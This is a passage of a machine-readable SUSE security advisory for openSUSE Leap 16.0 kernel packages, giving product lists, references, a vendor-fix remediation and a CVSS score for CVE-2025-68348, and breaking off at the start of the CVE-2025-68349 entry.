"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68348",
"url": "https://www.suse.com/security/cve/CVE-2025-68348"
},
{
"category": "external",
"summary": "SUSE Bug 1255694 for CVE-2025-68348",
"url": "https://bugzilla.suse.com/1255694"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68348"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
